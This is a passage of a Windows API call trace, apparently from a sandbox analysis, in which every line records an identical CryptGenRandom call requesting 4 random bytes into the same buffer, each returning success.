[0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.364] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 